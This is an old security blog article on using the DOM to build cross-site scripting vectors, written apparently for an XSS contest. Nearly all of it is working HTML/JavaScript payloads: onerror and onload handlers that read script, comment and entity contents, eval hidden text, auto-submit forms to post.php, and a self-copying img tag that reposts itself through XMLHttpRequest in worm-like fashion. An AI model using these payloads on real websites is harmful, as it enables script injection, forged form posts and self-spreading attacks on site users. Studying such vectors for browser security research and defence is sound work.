DOM for hackers

Back to articles

hackvertor

Author:

Gareth Heyes

@hackvertor

Published 17 years 9 months ago
Published: Wed, 09 Jan 2008 11:25:33 GMT
Updated: Wed, 01 Oct 2025 20:32:51 GMT
Read time: ⏱️ 2 min read

It's amazing the stuff I've been finding recently, my browser has crashed more times than windoze. In this article I'll introduce you to using the DOM for unexpected things and hacking it to your advantage. I've learned all this new stuff while hacking a vectors for the slackers XSS contest which is really fun.

Contents of a script tag

You can get the contents of a script tag within DOM like this:-

<script id="x">;alert(document.getElementById('x'). childNodes.item(0).nodeValue) </script>

Replacing tags

It's quite easy to replace one tag with another in ways the browser didn't expect, check the following example:-

<form><iframe onload="parentNode.innerHTML=(s=parentNode.innerHTML) .replace(/iframe/g,'input'),value=s"; name="content"></iframe>

Posting forms

There are lots of shortcuts for posting forms with dom, here I show how to use a image tag to automatically create a form and post content.

<img src="" onerror="with(appendChild(createElement('form'))) submit(i=createElement('input'),i.name='content',i.value='1', appendChild(i),action='post.php',method='post')">

Comment hacking

You can also get the contents of comments in DOM like this:-

<!-- test --><img src="" onerror="alert(previousSibling.nodeValue)">

Even evaluate the resulting string:-

<!-- alert('Hello') --><img src="" onerror="eval(previousSibling.nodeValue)">

Entity hacking

You can also do the same with entities :)

&Hello<img src="" onerror="alert(previousSibling.nodeValue.replace('&amp;',''))">

and even this:-

<iframe onload=alert(1)><img src="" onerror="innerHTML=previousSibling.nodeValue.replace('&amp;','&lt;')">

Self referencing code

You can get the contents of a attribute and create a self referencing tag that requires no parent:-

<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'), send('content='<img src=%22%22 onerror=%22'+attributes[0].nodeValue+'%22>')">

This example uses a XHR object to perform a post, the XHR portion of this vector was constructed by a lot of cool people on the slackers XSS contest.

Here's another example that I discovered:-

<img src="" onerror="appendChild(cloneNode(0));alert(innerHTML)">

DOM recursion

Finally it's also possible to make a tag clone itself onto itself:-

<img src="" onerror="appendChild(cloneNode(1))">

Back to articles